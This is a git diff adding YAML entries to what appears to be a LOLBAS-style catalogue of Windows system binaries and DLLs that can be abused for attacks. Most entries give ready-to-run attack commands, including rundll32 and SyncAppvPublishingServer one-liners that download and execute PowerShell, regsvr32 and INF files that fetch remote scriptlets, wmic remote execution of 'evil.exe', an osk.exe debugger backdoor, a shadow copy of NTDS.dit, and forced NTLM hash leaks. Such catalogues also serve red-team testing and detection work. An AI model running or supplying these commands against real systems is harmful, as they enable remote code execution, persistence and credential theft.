Thanks to Casey Smith - @subtee + diff --git a/OSBinaries/Regsvr32.yml b/OSBinaries/Regsvr32.yml new file mode 100644 index 0000000..1347c93 --- /dev/null +++ b/OSBinaries/Regsvr32.yml @@ -0,0 +1,22 @@ +--- +Name: Regsvr32.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll + Description: Execute the specified remote .SCT script with scrobj.dll. + - Commands: regsvr32.exe /s /u /i:file.sct scrobj.dll + Description: Execute the specified local .SCT script with scrobj.dll. +Full Path: + - C:\Windows\System32\regsvr32.exe + - C:\Windows\SysWOW64\regsvr32.exe +Code Sample: [] +Detection: [] +Resources: + - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Regsvr32.md + - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/ +Notes: Thanks to Casey Smith - @subtee + 
diff --git a/OSBinaries/Replace.yml b/OSBinaries/Replace.yml new file mode 100644 index 0000000..dd00da6 --- /dev/null +++ b/OSBinaries/Replace.yml @@ -0,0 +1,21 @@ +--- +Name: Replace.exe +Description: Copy, Download +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: replace.exe C:\Source\File.cab C:\Destination /A + Description: Copy the specified file to the destination folder. + - Command: replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A + Description: Copy the specified file to the destination folder. +Full Path: + - C:\Windows\System32\replace.exe + - C:\Windows\SysWOW64\replace.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/elceef/status/986334113941655553 + - https://twitter.com/elceef/status/986842299861782529 +Notes: Thanks to elceef - @elceef + diff --git a/OSBinaries/Robocopy.yml b/OSBinaries/Robocopy.yml new file mode 100644 index 0000000..7f7d425 --- /dev/null +++ b/OSBinaries/Robocopy.yml @@ -0,0 +1,20 @@ +--- +Name: Robocopy.exe +Description: Copy +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Robocopy.exe C:\SourceFolder C:\DestFolder + Description: Copy the entire contents of the SourceFolder to the DestFolder. + - Command: Robocopy.exe \\SERVER\SourceFolder C:\DestFolder + Description: Copy the entire contents of the SourceFolder to the DestFolder. +Full Path: + - c:\windows\system32\binary.exe + - c:\windows\sysWOW64\binary.exe +Code Sample: [] +Detection: [] +Resources: + - https://social.technet.microsoft.com/wiki/contents/articles/1073.robocopy-and-a-few-examples.aspx +Notes: Thanks to Name of guy - @twitterhandle + diff --git a/OSBinaries/Rpcping.yml b/OSBinaries/Rpcping.yml new file mode 100644 index 0000000..8ac1eab --- /dev/null +++ b/OSBinaries/Rpcping.yml 
@@ -0,0 +1,25 @@ +--- +Name: Rpcping.exe +Description: Credentials +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rpcping -s 127.0.0.1 -t ncacn_np + Description: Send a RPC test connection to the target server (-s) sending the password hash in the process. + - Command: rpcping -s 192.168.1.10 -ncacn_np + Description: Send a RPC test connection to the target server (-s) sending the password hash in the process. + - Command: rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM + Description: Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. +Full Path: + - C:\Windows\System32\rpcping.exe + - C:\Windows\SysWOW64\rpcping.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/subtee/status/872797890539913216 + - https://github.com/vysec/RedTips + - https://twitter.com/vysecurity/status/974806438316072960 + - https://twitter.com/vysecurity/status/873181705024266241 +Notes: Thanks to Casey Smith - @subtee, Vincent Yiu - @vysecurity + diff --git a/OSBinaries/Rundll32.yml b/OSBinaries/Rundll32.yml new file mode 100644 index 0000000..494b4bb --- /dev/null +++ b/OSBinaries/Rundll32.yml 
@@ -0,0 +1,32 @@ +--- +Name: Rundll32.exe +Description: Execute, Read ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32.exe AllTheThingsx64,EntryPoint + Description: Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute. + - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" + Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site. + - Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()"); + Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe. + - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} + Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started. + - Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") + Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script. + - Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain + Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS). 
+Full Path: + - C:\Windows\System32\rundll32.exe + - C:\Windows\SysWOW64\rundll32.exe +Code Sample: [] +Detection: [] +Resources: + - https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/ + - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7 + - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md + - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Notes: Thanks to Casey Smith - @subtee + diff --git a/OSBinaries/Runonce.yml b/OSBinaries/Runonce.yml new file mode 100644 index 0000000..9d32bb5 --- /dev/null +++ b/OSBinaries/Runonce.yml @@ -0,0 +1,20 @@ +--- +Name: Runonce.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Runonce.exe /AlternateShellStartup + Description: Executes a Run Once Task that has been configured in the registry. +Full Path: + - c:\windows\system32\runonce.exe + - c:\windows\sysWOW64\runonce.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/990717080805789697 + - https://cmatskas.com/configure-a-runonce-task-on-windows/ +Notes: | + Thanks to Pierre-Alexandre Braeken - @pabraeken + Requires Administrative access. diff --git a/OSBinaries/Runscripthelper.yml b/OSBinaries/Runscripthelper.yml new file mode 100644 index 0000000..5c25cc7 --- /dev/null +++ b/OSBinaries/Runscripthelper.yml 
@@ -0,0 +1,17 @@ +--- +Name: Runscripthelper.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: runscripthelper.exe surfacecheck \\?\C:\Test\Microsoft\Diagnosis\scripts\test.txt C:\Test + Description: Execute the PowerShell script named test.txt. +Full Path: + - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe ' + - 'C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe ' +Code Sample: [] +Detection: [] +Resources: + - https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc +Notes: Thanks to Matt Graeber - @mattifestation diff --git a/OSBinaries/Sc.yml b/OSBinaries/Sc.yml new file mode 100644 index 0000000..d2277f3 --- /dev/null +++ b/OSBinaries/Sc.yml @@ -0,0 +1,19 @@ +--- +Name: SC.exe +Description: Execute, Read ADS, Create Service, Start Service +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: | + sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto + sc start evilservice + Description: '' +Full Path: + - C:\Windows\System32\sc.exe + - C:\Windows\SysWOW64\sc.exe +Code Sample: [] +Detection: [] +Resources: + - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ +Notes: Thanks to Oddvar Moe - @oddvarmoe diff --git a/OSBinaries/Scriptrunner.yml b/OSBinaries/Scriptrunner.yml new file mode 100644 index 0000000..ea21da1 --- /dev/null +++ b/OSBinaries/Scriptrunner.yml 
@@ -0,0 +1,21 @@ +--- +Name: Scriptrunner.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Scriptrunner.exe -appvscript calc.exe + Description: Execute calc.exe. + - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" + Description: Execute the calc.cmd script on the remote share. +Full Path: + - c:\windows\system32\scriptrunner.exe + - c:\windows\sysWOW64\scriptrunner.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/KyleHanslovan/status/914800377580503040 + - https://twitter.com/NickTyrer/status/914234924655312896 + - https://github.com/MoooKitty/Code-Execution +Notes: Thanks to Nick Tyrer - @NickTyrer diff --git a/OSBinaries/Syncappvpublishingserver.yml b/OSBinaries/Syncappvpublishingserver.yml new file mode 100644 index 0000000..a284590 --- /dev/null +++ b/OSBinaries/Syncappvpublishingserver.yml @@ -0,0 +1,16 @@ +--- +Name: SyncAppvPublishingServer.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" + Description: Example command on how inject Powershell code into the process +Full Path: + - C:\Windows\System32\SyncAppvPublishingServer.exe +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/monoxgas/status/895045566090010624 +Notes: Thanks to Nick Landers - @monoxgas diff --git a/OSBinaries/Wab.yml b/OSBinaries/Wab.yml new file mode 100644 index 0000000..dba8f83 --- /dev/null +++ b/OSBinaries/Wab.yml 
@@ -0,0 +1,20 @@ +--- +Name: Wab.exe +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: Wab.exe + Description: Loads a DLL configured in the registry under HKLM. +Full Path: + - 'C:\Program Files\Windows Mail\wab.exe ' + - 'C:\Program Files (x86)\Windows Mail\wab.exe ' +Code Sample: [] +Detection: [] +Resources: + - http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/ + - https://twitter.com/Hexacorn/status/991447379864932352 +Notes: | + Thanks to Adam - @Hexacorn + Requires registry changes, Requires Administrative Access diff --git a/OSBinaries/Wmic.yml b/OSBinaries/Wmic.yml new file mode 100644 index 0000000..d49bfc1 --- /dev/null +++ b/OSBinaries/Wmic.yml 
@@ -0,0 +1,46 @@ +--- +Name: WMIC.exe +Description: Reconnaissance, Execute, Read ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: wmic.exe process call create calc + Description: Execute calc.exe. + - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" + Description: Execute a .EXE file stored as an Alternate Data Stream (ADS). + - Command: wmic.exe useraccount get /ALL + Description: List the user accounts on the machine. + - Command: wmic.exe process get caption,executablepath,commandline + Description: Gets the command line used to execute a running program. + - Command: wmic.exe qfe get description,installedOn /format:csv + Description: Gets a list of installed Windows updates. + - Command: wmic.exe /node:"192.168.0.1" service where (caption like "%sql server (%") + Description: Check to see if the target system is running SQL. + - Command: get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" + Description: Use the PowerShell cmdlet to list the shares on a remote server. + - Command: wmic.exe /user: /password: /node: process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" + Description: Add cmd.exe as a debugger for the osk.exe process. Each time osk.exe is run, cmd.exe will be run as well. + - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" + Description: Execute evil.exe on the remote system. + - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" + Description: Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm. + - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" + Description: Create a volume shadow copy of NTDS.dit that can be copied. 
+ - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" + Description: Execute a script contained in the target .XSL file hosted on a remote server. + - Command: wmic.exe os get /format:"MYXSLFILE.xsl" + Description: Executes JScript or VBScript embedded in the target XSL stylesheet. + - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" + Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. + +Full Path: + - c:\windows\system32\wbem\wmic.exe + - c:\windows\sysWOW64\wbem\wmic.exe +Code Sample: [] +Detection: [] +Resources: + - https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory + - https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html + - https://twitter.com/subTee/status/986234811944648707 +Notes: Thanks to Casey Smith - @subtee diff --git a/OSBinaries/Wscript.yml b/OSBinaries/Wscript.yml new file mode 100644 index 0000000..989c166 --- /dev/null +++ b/OSBinaries/Wscript.yml @@ -0,0 +1,17 @@ +--- +Name: Wscript.exe +Description: Execute, Read ADS +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: wscript c:\ads\file.txt:script.vbs + Description: Executes the .VBS script stored as an Alternate Data Stream (ADS). +Full Path: + - c:\windows\system32\wscript.exe + - c:\windows\sysWOW64\wscript.exe +Code Sample: [] +Detection: [] +Resources: + - '?' +Notes: Thanks to ? diff --git a/OSBinaries/Xwizard.yml b/OSBinaries/Xwizard.yml new file mode 100644 index 0000000..b5f5d0d --- /dev/null +++ b/OSBinaries/Xwizard.yml 
@@ -0,0 +1,21 @@ +--- +Name: Xwizard.exe +Description: DLL hijack, Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: xwizard.exe + Description: Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll. + - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} + Description: Xwizard.exe running a custom class that has been added to the registry. +Full Path: + - c:\windows\system32\xwizard.exe + - c:\windows\sysWOW32\xwizard.exe +Code Sample: [] +Detection: [] +Resources: + - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ + - https://www.youtube.com/watch?v=LwDHX7DVHWU + - https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 +Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer diff --git a/OSLibraries/Advpack.yml b/OSLibraries/Advpack.yml new file mode 100644 index 0000000..25106bd --- /dev/null +++ b/OSLibraries/Advpack.yml 
@@ -0,0 +1,30 @@ +--- +Name: Advpack.dll +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1, + Description: Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified). + - Command: rundll32.exe advpack.dll,LaunchINFSection test.inf,,1, + Description: Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied). + - Command: rundll32.exe Advpack.dll,RegisterOCX calc.exe + Description: Launch executable by calling the RegisterOCX function. + - Command: rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" + Description: Launch executable by calling the RegisterOCX function. + - Command: rundll32.exe Advpack.dll,RegisterOCX test.dll + Description: Launch a DLL payload by calling the RegisterOCX function. +Full Path: + - c:\windows\system32\advpack.dll + - c:\windows\sysWOW64\advpack.dll +Code Sample: + - https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack.inf + - https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct +Detection: [] +Resources: + - https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ + - https://twitter.com/ItsReallyNick/status/967859147977850880 + - https://twitter.com/bohops/status/974497123101179904 + - https://twitter.com/moriarty_meng/status/977848311603380224 +Notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd) diff --git a/OSLibraries/Ieadvpack.yml b/OSLibraries/Ieadvpack.yml new file mode 100644 index 0000000..044af4b --- /dev/null +++ b/OSLibraries/Ieadvpack.yml 
@@ -0,0 +1,28 @@ +--- +Name: Ieadvpack.dll +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32.exe IEAdvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1, + Description: Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified). + - Command: rundll32.exe IEAdvpack.dll,LaunchINFSection test.inf,,1, + Description: Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied). + - Command: rundll32.exe IEAdvpack.dll,RegisterOCX calc.exe + Description: Launch executable by calling the RegisterOCX function. + - Command: rundll32.exe IEAdvpack.dll,RegisterOCX test.dll + Description: Launch a DLL payload by calling the RegisterOCX function. +Full Path: + - c:\windows\system32\ieadvpack.dll + - c:\windows\sysWOW64\ieadvpack.dll +Code Sample: + - https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack.inf + - https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/991695411902599168 + - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ + - https://twitter.com/0rbz_/status/974472392012689408 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (RegisterOCX - Cmd), Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL) + diff --git a/OSLibraries/Ieframe.yml b/OSLibraries/Ieframe.yml new file mode 100644 index 0000000..ab7eb56 --- /dev/null +++ b/OSLibraries/Ieframe.yml 
@@ -0,0 +1,22 @@ +--- +Name: Ieframe.dll +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + - Command: rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz + Description: Renamed URL file. +Full Path: + - c:\windows\system32\Ieframe.dll + - c:\windows\sysWOW64\Ieframe.dll +Code Sample: + - https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url +Detection: [] +Resources: + - http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ + - https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - https://twitter.com/bohops/status/997690405092290561 +Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops diff --git a/OSLibraries/Mshtml.yml b/OSLibraries/Mshtml.yml new file mode 100644 index 0000000..cf87275 --- /dev/null +++ b/OSLibraries/Mshtml.yml @@ -0,0 +1,17 @@ +--- +Name: Mshtml.dll +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" + Description: Invoke an HTML Application. Note - Pops a security warning and a print dialogue box. +Full Path: + - c:\windows\system32\Mshtml.dll + - c:\windows\sysWOW64\Mshtml.dll +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/998567549670477824 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken diff --git a/OSLibraries/Payload/Advpack.inf b/OSLibraries/Payload/Advpack.inf new file mode 100644 index 0000000..97e3ecb --- /dev/null +++ b/OSLibraries/Payload/Advpack.inf 
@@ -0,0 +1,14 @@ +[version] +Signature=$chicago$ +AdvancedINF=2.5 + +[DefaultInstall_SingleUser] +UnRegisterOCXs=UnRegisterOCXSection + +[UnRegisterOCXSection] +%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct + +[Strings] +AppAct = "SOFTWARE\Microsoft\Connection Manager" +ServiceName="Yay" +ShortSvcName="Yay" \ No newline at end of file diff --git a/OSLibraries/Payload/Advpack_calc.sct b/OSLibraries/Payload/Advpack_calc.sct new file mode 100644 index 0000000..a167c12 --- /dev/null +++ b/OSLibraries/Payload/Advpack_calc.sct @@ -0,0 +1,44 @@ + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/OSLibraries/Payload/Ieadvpack.inf b/OSLibraries/Payload/Ieadvpack.inf new file mode 100644 index 0000000..97e3ecb --- /dev/null +++ b/OSLibraries/Payload/Ieadvpack.inf @@ -0,0 +1,14 @@ +[version] +Signature=$chicago$ +AdvancedINF=2.5 + +[DefaultInstall_SingleUser] +UnRegisterOCXs=UnRegisterOCXSection + +[UnRegisterOCXSection] +%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct + +[Strings] +AppAct = "SOFTWARE\Microsoft\Connection Manager" +ServiceName="Yay" +ShortSvcName="Yay" \ No newline at end of file diff --git a/OSLibraries/Payload/Ieadvpack_calc.sct b/OSLibraries/Payload/Ieadvpack_calc.sct new file mode 100644 index 0000000..a167c12 --- /dev/null +++ b/OSLibraries/Payload/Ieadvpack_calc.sct @@ -0,0 +1,44 @@ + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/OSLibraries/Pcwutl.yml b/OSLibraries/Pcwutl.yml new file mode 100644 index 0000000..15e4887 --- /dev/null +++ b/OSLibraries/Pcwutl.yml 
@@ -0,0 +1,17 @@ +--- +Name: Pcwutl.dll +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe + Description: Launch executable by calling the LaunchApplication function. +Full Path: + - c:\windows\system32\Pcwutl.dll + - c:\windows\sysWOW64\Pcwutl.dll +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/harr0ey/status/989617817849876488 +Notes: Thanks to Matt harr0ey - @harr0ey diff --git a/OSLibraries/Setupapi.yml b/OSLibraries/Setupapi.yml new file mode 100644 index 0000000..626fb42 --- /dev/null +++ b/OSLibraries/Setupapi.yml 
@@ -0,0 +1,25 @@ +--- +Name: Setupapi.dll +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf + Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. + - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf + Description: Remote fetch and execute a COM Scriptlet by calling an information file directive. +Full Path: + - c:\windows\system32\Setupapi.dll + - c:\windows\sysWOW64\Setupapi.dll +Code Sample: + - https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf + - https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct + - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/994742106852941825 + - https://twitter.com/subTee/status/951115319040356352 + - https://twitter.com/KyleHanslovan/status/911997635455852544 + - https://github.com/huntresslabs/evading-autoruns +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet) diff --git a/OSLibraries/Shdocvw.yml b/OSLibraries/Shdocvw.yml new file mode 100644 index 0000000..33023d7 --- /dev/null +++ b/OSLibraries/Shdocvw.yml 
@@ -0,0 +1,22 @@ +--- +Name: Shdocvw.dll +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz" + Description: Renamed URL file. +Full Path: + - c:\windows\system32\Shdocvw.dll + - c:\windows\sysWOW64\Shdocvw.dll +Code Sample: + - https://gist.githubusercontent.com/bohops/89d7b11fa32062cfe31be9fdb18f050e/raw/1206a613a6621da21e7fd164b80a7ff01c5b64ab/calc.url +Detection: [] +Resources: + - http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ + - https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - https://twitter.com/bohops/status/997690405092290561 +Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops diff --git a/OSLibraries/Shell32.yml b/OSLibraries/Shell32.yml new file mode 100644 index 0000000..030887f --- /dev/null +++ b/OSLibraries/Shell32.yml 
@@ -0,0 +1,24 @@ +--- +Name: Shell32.dll +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll + Description: Launch DLL payload. + - Command: rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe + Description: Launch executable payload. + - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" + Description: Launch executable payload with arguments. +Full Path: + - c:\windows\system32\shell32.dll + - c:\windows\sysWOW64\shell32.dll +Code Sample: [] +Detection: [] +Resources: + - https://twitter.com/Hexacorn/status/885258886428725250 + - https://twitter.com/pabraeken/status/991768766898941953 + - https://twitter.com/mattifestation/status/776574940128485376 + - https://twitter.com/KyleHanslovan/status/905189665120149506 +Notes: Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL) diff --git a/OSLibraries/Syssetup.yml b/OSLibraries/Syssetup.yml new file mode 100644 index 0000000..8612289 --- /dev/null +++ b/OSLibraries/Syssetup.yml 
@@ -0,0 +1,24 @@ +--- +Name: Syssetup.dll +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF + Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. + - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf + Description: Remote fetch and execute a COM Scriptlet by calling an information file directive. +Full Path: + - c:\windows\system32\Syssetup.dll + - c:\windows\sysWOW64\Syssetup.dll +Code Sample: + - https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf + - https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct + - https://gist.githubusercontent.com/bohops/0cc6586f205f3691e04a1ebf1806aabd/raw/baf7b29891bb91e76198e30889fbf7d6642e8974/calc_exe.inf +Detection: [] +Resources: + - https://twitter.com/pabraeken/status/994392481927258113 + - https://twitter.com/harr0ey/status/975350238184697857 + - https://twitter.com/bohops/status/975549525938135040 +Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet) diff --git a/OSLibraries/Url.yml b/OSLibraries/Url.yml new file mode 100644 index 0000000..0c1221f --- /dev/null +++ b/OSLibraries/Url.yml 
@@ -0,0 +1,33 @@ +--- +Name: Url.dll +Description: Execute +Author: '' +Created: '2018-05-25' +Categories: [] +Commands: + - Command: rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta" + Description: Launch a HTML application payload by calling OpenURL. + - Command: rundll32.exe url.dll,OpenURL "C:\\test\\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable payload by calling OpenURL. + - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe + Description: Launch an executable payload by calling FileProtocolHandler. + - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta + Description: Launch a HTML application payload by calling FileProtocolHandler. + - Command: rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable payload by calling FileProtocolHandler. + +Full Path: + - c:\windows\system32\url.dll + - c:\windows\sysWOW64\url.dll +Code Sample: + - 